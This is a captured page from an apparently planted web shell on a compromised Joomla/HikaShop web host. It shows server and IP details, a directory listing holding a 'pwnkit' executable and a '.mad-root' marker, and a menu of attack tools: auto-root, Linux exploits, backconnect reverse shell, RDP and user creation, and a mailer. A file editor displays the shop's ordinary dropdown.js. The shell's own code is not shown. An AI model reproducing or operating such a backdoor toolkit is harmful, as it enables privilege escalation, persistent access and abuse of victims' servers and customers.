Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_hikashop /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Sortable.min.js
42.52
KB
-rw-r--r--
checkout.js
8.3
KB
-rw-r--r--
checkoutworkflow.js
13.14
KB
-rw-r--r--
creditcard.js
6.55
KB
-rw-r--r--
dropdown.js
4.32
KB
-rw-r--r--
formCustom.js
14.24
KB
-rw-r--r--
hikashop.js
65.14
KB
-rw-r--r--
iframe.js
964
B
-rw-r--r--
index.html
28
B
-rw-r--r--
jquery-ui.min.js
144.81
KB
-rw-r--r--
jquery.min.js
95.01
KB
-rw-r--r--
notify.js
18.15
KB
-rw-r--r--
notify.min.js
10.3
KB
-rw-r--r--
nouislider.min.js
23.06
KB
-rw-r--r--
opload.js
26.98
KB
-rw-r--r--
otree.js
60.48
KB
-rw-r--r--
owl.carousel.min.js
42.09
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
tooltip.js
8.43
KB
-rw-r--r--
vex.min.js
7.25
KB
-rw-r--r--
vote.js
12.91
KB
-rw-r--r--
wNumb.js
9.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dropdown.js
/** * @package HikaShop for Joomla! * @version 4.5.1 * @author hikashop.com * @copyright (C) 2010-2022 HIKARI SOFTWARE. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ if(window.jQuery && typeof(jQuery.noConflict) == "function" && !window.hkjQuery) window.hkjQuery = jQuery.noConflict(); !function ($) { "use strict"; // jshint ;_; /* DROPDOWN CLASS DEFINITION * ========================= */ var toggle = '[data-toggle=hkdropdown]', HKDropdown = function (element) { var $el = $(element).on('click.hkdropdown.data-api', this.toggle) .on('mouseover.hkdropdown.data-api', this.toggle); $('html').on('click.hkdropdown.data-api', function () { $el.parent().parent().removeClass('hk-nav-hover'); $el.parent().removeClass('open'); }); }; HKDropdown.prototype = { constructor: HKDropdown, toggle: function (e) { var $this = $(this), $parent, isActive, isHover; if ($this.is('.disabled, :disabled')) return; $parent = getParent($this); isActive = $parent.hasClass('open'); isHover = $parent.parent().hasClass('hk-nav-hover'); if(!isHover && e.type == 'mouseover') return; clearMenus(); if ((!isActive && e.type != 'mouseover') || (isHover && e.type == 'mouseover')) { if ('ontouchstart' in document.documentElement) { // if mobile we we use a backdrop because click events don't delegate $('<div class="hk-dropdown-backdrop"/>').insertBefore($(this)).on('click', clearMenus); $this.on('hover', function () { $('.hk-dropdown-backdrop').remove(); }); } $parent.parent().toggleClass('hk-nav-hover'); $parent.toggleClass('open'); } $this.focus(); return false; }, keydown: function (e) { var $this, $items, $active, $parent, isActive, index; if (!/(38|40|27)/.test(e.keyCode)) return; $this = $(this); e.preventDefault(); e.stopPropagation(); if ($this.is('.disabled, :disabled')) return; $parent = getParent($this); isActive = $parent.hasClass('open'); if (!isActive || (isActive && e.keyCode == 27)) { if (e.which == 27) $parent.find(toggle).focus(); return $this.click(); } $items = $('[role=menu] li:not(.divider):visible a', $parent); if (!$items.length) return; index = $items.index($items.filter(':focus')); if (e.keyCode == 38 && index > 0) index--; // up if (e.keyCode == 40 && index < $items.length - 1) index++; // down if (!~index) index = 0; $items .eq(index) .focus(); } }; function clearMenus() { $(toggle).parent().parent().removeClass('hk-nav-hover'); $(toggle).each(function () { getParent($(this)).removeClass('open'); }); $('.hk-dropdown-backdrop').remove(); } function getParent($this) { var selector = $this.attr('data-target'), $parent; if (!selector) { selector = $this.attr('href'); selector = selector && /#/.test(selector) && selector.replace(/.*(?=#[^\s]*$)/, ''); //strip for ie7; if(selector == '#') selector = false; } $parent = selector && $(selector); if (!$parent || !$parent.length) $parent = $this.parent(); return $parent; } /* DROPDOWN PLUGIN DEFINITION * ========================== */ var old = $.fn.hkdropdown; $.fn.hkdropdown = function (option) { return this.each(function () { var $this = $(this) , data = $this.data('hkdropdown'); if (!data) $this.data('hkdropdown', (data = new HKDropdown(this))); if (typeof option == 'string') data[option].call($this); }); }; $.fn.hkdropdown.Constructor = HKDropdown; /* DROPDOWN NO CONFLICT * ==================== */ $.fn.hkdropdown.noConflict = function () { $.fn.hkdropdown = old; return this; }; /* APPLY TO STANDARD DROPDOWN ELEMENTS * =================================== */ $(document) .on('click.hkdropdown.data-api', clearMenus) .on('click.hkdropdown.data-api', '.hkdropdown form', function (e) { e.stopPropagation(); }) .on('click.hkdropdown.data-api', toggle, HKDropdown.prototype.toggle) .on('keydown.hkdropdown.data-api', toggle + ', [role=menu]' , HKDropdown.prototype.keydown) .on('mouseover.hkdropdown.data-api', toggle, HKDropdown.prototype.toggle); }(window.jQuery); hkjQuery(function(){ hkjQuery('[data-toggle="hkdropdown"]').hkdropdown(); });
Close